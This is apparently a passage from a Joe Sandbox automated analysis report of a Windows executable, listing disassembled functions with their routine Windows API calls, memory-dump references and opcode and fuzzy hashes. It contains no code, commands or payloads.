                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 7b74b6596aa218f6f87b91dcbc191e2d9dd95fa7a9e6abb41c52b9343c0da785
                                  • Instruction ID: 850fc7007a802a55415490a1de5068a5979200fa042b8425594c943c6fffa007
                                  • Opcode Fuzzy Hash: 7b74b6596aa218f6f87b91dcbc191e2d9dd95fa7a9e6abb41c52b9343c0da785
                                  • Instruction Fuzzy Hash: 8E11273A901219FFEB119BA4C985FEDFB78EB08754F200091EA00B7290D671AE50DB94
                                  Function 003BE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 003BE1FD
                                  • MessageBoxW.USER32(?,?,?,?), ref: 003BE230
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003BE246
                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003BE24D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 2880819207-0
                                  • Opcode ID: 74ef4fbaca542b104d272dc6119761af29250ec2fb27d9676ba3016a01f82db1
                                  • Instruction ID: 887bdfb1ea7f909ed81201dd283ee095f72e883c63341d27f638cdc5933618a7
                                  • Opcode Fuzzy Hash: 74ef4fbaca542b104d272dc6119761af29250ec2fb27d9676ba3016a01f82db1
                                  • Instruction Fuzzy Hash: 53114872E04248BFD722DBACDC45ADE3FADAB41314F004325F924D7690C270CD0187A0
                                  Function 0037D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNEL32(00000000,?,0037CFF9,00000000,00000004,00000000), ref: 0037D218
                                  • GetLastError.KERNEL32 ref: 0037D224
                                  • __dosmaperr.LIBCMT ref: 0037D22B
                                  • ResumeThread.KERNEL32(00000000), ref: 0037D249
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                                  • String ID:
                                  • API String ID: 173952441-0
                                  • Opcode ID: ef520532af5b94bdf093791e207f7405c7ba0050f256c6c93d9f54c1f77c90da
                                  • Instruction ID: 6f584d309d6a2e5be8760384f248a77886387f9eb83fa5c8beb82a47ce527526
                                  • Opcode Fuzzy Hash: ef520532af5b94bdf093791e207f7405c7ba0050f256c6c93d9f54c1f77c90da
                                  • Instruction Fuzzy Hash: 2201D636415208BBCB335BA5DC45BAE7A7DEF81731F218719F9299A1D1CB788902C7A0
                                  Function 0035600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0035604C
                                  • GetStockObject.GDI32(00000011), ref: 00356060
                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0035606A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CreateMessageObjectSendStockWindow
                                  • String ID:
                                  • API String ID: 3970641297-0
                                  • Opcode ID: 7f1448fb94e9cfa73526467c7fdd776ed6471db75bcbdcdf84c0a0c881feeff5
                                  • Instruction ID: 05cbb69c5a3a545cf572abadb5c1b9c059c70c4a0fb8f405724b9ad69dc47dc2
                                  • Opcode Fuzzy Hash: 7f1448fb94e9cfa73526467c7fdd776ed6471db75bcbdcdf84c0a0c881feeff5
                                  • Instruction Fuzzy Hash: 971179B2105648BFEF234FA48C85EEABB6DEF083A5F450211FE04571A0C7329C61DBA0
                                  Function 00373B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00373B56
                                    • Part of subcall function 00373AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00373AD2
                                    • Part of subcall function 00373AA3: ___AdjustPointer.LIBCMT ref: 00373AED
                                  • _UnwindNestedFrames.LIBCMT ref: 00373B6B
                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00373B7C
                                  • CallCatchBlock.LIBVCRUNTIME ref: 00373BA4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                  • String ID:
                                  • API String ID: 737400349-0
                                  • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                  • Instruction ID: 97a08b921427f2c57b5e422f5846564dbd294eb8ee05d2da08e682dd981cb298
                                  • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                  • Instruction Fuzzy Hash: 74012932100148BBDF225E95CC46EEB3B69EF48754F058018FE5C5A121C73AE961EBA1
                                  Function 00383073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003513C6,00000000,00000000,?,0038301A,003513C6,00000000,00000000,00000000,?,0038328B,00000006,FlsSetValue), ref: 003830A5
                                  • GetLastError.KERNEL32(?,0038301A,003513C6,00000000,00000000,00000000,?,0038328B,00000006,FlsSetValue,003F2290,FlsSetValue,00000000,00000364,?,00382E46), ref: 003830B1
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0038301A,003513C6,00000000,00000000,00000000,?,0038328B,00000006,FlsSetValue,003F2290,FlsSetValue,00000000), ref: 003830BF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID:
                                  • API String ID: 3177248105-0
                                  • Opcode ID: f85604ffa74b14e9e227a1f2f3b5853dc027f5f7670fa7f6a153cfc8eee37017
                                  • Instruction ID: 9b20344150c8a6370d1e874baf7ad4e781c9720aba7b78277341340e259a3d9a
                                  • Opcode Fuzzy Hash: f85604ffa74b14e9e227a1f2f3b5853dc027f5f7670fa7f6a153cfc8eee37017
                                  • Instruction Fuzzy Hash: 2A018876752322ABCB335AB99C84967779C9F45F61B110760F917D7380D721D902C7E0
                                  Function 003B7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 003B747F
                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003B7497
                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003B74AC
                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003B74CA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Type$Register$FileLoadModuleNameUser
                                  • String ID:
                                  • API String ID: 1352324309-0
                                  • Opcode ID: 0cd06057497079f561cec0ea91b2e442883d724a7fb1debb96a0a4bf42621a44
                                  • Instruction ID: da1ffc92c3e5bcf62cfc2fbf9a1d4fd4b641dc8ee9154c0a9f084c0c709b3846
                                  • Opcode Fuzzy Hash: 0cd06057497079f561cec0ea91b2e442883d724a7fb1debb96a0a4bf42621a44
                                  • Instruction Fuzzy Hash: 1911E1B02053049BE3328F16DC48FE67BFCEB40B08F108569A616DA991D770E904DF50
                                  Function 003BB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,003BACD3,?,00008000), ref: 003BB0C4
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,003BACD3,?,00008000), ref: 003BB0E9
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,003BACD3,?,00008000), ref: 003BB0F3
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,003BACD3,?,00008000), ref: 003BB126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CounterPerformanceQuerySleep
                                  • String ID:
                                  • API String ID: 2875609808-0
                                  • Opcode ID: be24b36b72cf33d2252f9940173898f08fdc4ac091f8da7a9a564948789ef54f
                                  • Instruction ID: 8d9bb5acb37b6b6e35fc7c41e82b718a5bc7755db4a430b55aa0804d6b57618e
                                  • Opcode Fuzzy Hash: be24b36b72cf33d2252f9940173898f08fdc4ac091f8da7a9a564948789ef54f
                                  • Instruction Fuzzy Hash: A2117931C0052CE7CF12AFA8E9986EEFB78FF0A314F114185DA81B6681CFB086518B51
                                  Function 003B2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003B2DC5
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 003B2DD6
                                  • GetCurrentThreadId.KERNEL32 ref: 003B2DDD
                                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 003B2DE4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                  • String ID:
                                  • API String ID: 2710830443-0
                                  • Opcode ID: 0a52f0e9b4dbfeea152bcaf88ab1d36b5fee91bea486db880572e2c14bf53716
                                  • Instruction ID: 9a8ad1dce326f3862b1833218f45dcddf450d5e2ea37ee2166a0c82b25b4197f
                                  • Opcode Fuzzy Hash: 0a52f0e9b4dbfeea152bcaf88ab1d36b5fee91bea486db880572e2c14bf53716
                                  • Instruction Fuzzy Hash: 4DE09272111228BBDB321B729C4DFEF3E6CFF42BA5F041219F215D54C09AA4C842C6B0
                                  Function 003E8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00369639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00369693
                                    • Part of subcall function 00369639: SelectObject.GDI32(?,00000000), ref: 003696A2
                                    • Part of subcall function 00369639: BeginPath.GDI32(?), ref: 003696B9
                                    • Part of subcall function 00369639: SelectObject.GDI32(?,00000000), ref: 003696E2
                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 003E8887
                                  • LineTo.GDI32(?,?,?), ref: 003E8894
                                  • EndPath.GDI32(?), ref: 003E88A4
                                  • StrokePath.GDI32(?), ref: 003E88B2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                  • String ID:
                                  • API String ID: 1539411459-0
                                  • Opcode ID: b39f398d7b88b0a9c89bd814f9f691948e7e11fde5071b9dcc9381ffe30c5e8c
                                  • Instruction ID: f0affa3b14bd1ee6873cdbbd52eb9c77a9f94ba910ce36a36f53b3c386dda289
                                  • Opcode Fuzzy Hash: b39f398d7b88b0a9c89bd814f9f691948e7e11fde5071b9dcc9381ffe30c5e8c
                                  • Instruction Fuzzy Hash: A4F03A361412A8BADB235F94AC09FCE3A59AF16320F448200FE11690E1C7755952CBA9
                                  Function 003698B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSysColor.USER32(00000008), ref: 003698CC
                                  • SetTextColor.GDI32(?,?), ref: 003698D6
                                  • SetBkMode.GDI32(?,00000001), ref: 003698E9
                                  • GetStockObject.GDI32(00000005), ref: 003698F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Color$ModeObjectStockText
                                  • String ID:
                                  • API String ID: 4037423528-0
                                  • Opcode ID: 5bc1abc25890946a300d66746d92e2e10ee236dc8117d90cc1436b2a7892cb69
                                  • Instruction ID: c4c932b8ea1db78d63f9c4a41691bbb9924a3a30fd8bac3388028be18ee9e75b
                                  • Opcode Fuzzy Hash: 5bc1abc25890946a300d66746d92e2e10ee236dc8117d90cc1436b2a7892cb69
                                  • Instruction Fuzzy Hash: 80E06D31254680AADB325B79EC49BEC3F68EB12336F05831AF6FA980E1C37146429B10
                                  Function 003B162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentThread.KERNEL32 ref: 003B1634
                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,003B11D9), ref: 003B163B
                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003B11D9), ref: 003B1648
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,003B11D9), ref: 003B164F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CurrentOpenProcessThreadToken
                                  • String ID:
                                  • API String ID: 3974789173-0
                                  • Opcode ID: f7a601f719478910b0e39e7857b51206ee2c2fa394e7f428245889a87661cfdd
                                  • Instruction ID: 5dfb03a75e97399dc44a44109cef7d6255dca483a3a75e1d7a7ba93d33b2fb33
                                  • Opcode Fuzzy Hash: f7a601f719478910b0e39e7857b51206ee2c2fa394e7f428245889a87661cfdd
                                  • Instruction Fuzzy Hash: DEE04632612211EBDB311BA4AE4DB8A3B6CAF447A6F158908FB45CD0C0E7289842CB60
                                  Function 003AD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDesktopWindow.USER32 ref: 003AD858
                                  • GetDC.USER32(00000000), ref: 003AD862
                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003AD882
                                  • ReleaseDC.USER32(?), ref: 003AD8A3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CapsDesktopDeviceReleaseWindow
                                  • String ID:
                                  • API String ID: 2889604237-0
                                  • Opcode ID: c416b5856e128d2a27f0e85b6fae4a7f533ba80c363942886198d6ebaa102711
                                  • Instruction ID: 15717e635cec414a4322d7ea2fd64dd2f75ec89f75eb2e4262aa4e80e1fa90e9
                                  • Opcode Fuzzy Hash: c416b5856e128d2a27f0e85b6fae4a7f533ba80c363942886198d6ebaa102711
                                  • Instruction Fuzzy Hash: 9BE01AB4810204DFCF529FA4DC48A6EBFB9FB48311F14A509E816EB290C7389902EF40
                                  Function 003AD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDesktopWindow.USER32 ref: 003AD86C
                                  • GetDC.USER32(00000000), ref: 003AD876
                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003AD882
                                  • ReleaseDC.USER32(?), ref: 003AD8A3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CapsDesktopDeviceReleaseWindow
                                  • String ID:
                                  • API String ID: 2889604237-0
                                  • Opcode ID: ed92bee947b0bf81b4f9d201e88c79a6d941d71ad438c8ab3e060953f0ae9c5f
                                  • Instruction ID: 817adfe9ffb9888c6abfcf937b41c4cfe92f408fb7c67ca2b12e37b3615b421f
                                  • Opcode Fuzzy Hash: ed92bee947b0bf81b4f9d201e88c79a6d941d71ad438c8ab3e060953f0ae9c5f
                                  • Instruction Fuzzy Hash: 3EE01A74C10200DFCF629FA4DC4866EBFB9BB48311F14A508E816EB290C7385902DF40
                                  Function 003C4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                  Download Yara Rule
                                  APIs
